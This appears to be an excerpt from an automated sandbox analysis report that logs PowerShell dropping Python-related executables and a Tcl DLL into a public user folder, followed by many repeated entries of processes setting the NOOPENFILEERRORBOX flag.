                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip3.12.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\wsdump.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\nmake\x86_64-w64-mingw32-nmakehlp.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\dde1.4\tcldde14.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\normalizer.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip3.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip.exeJump to dropped file
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
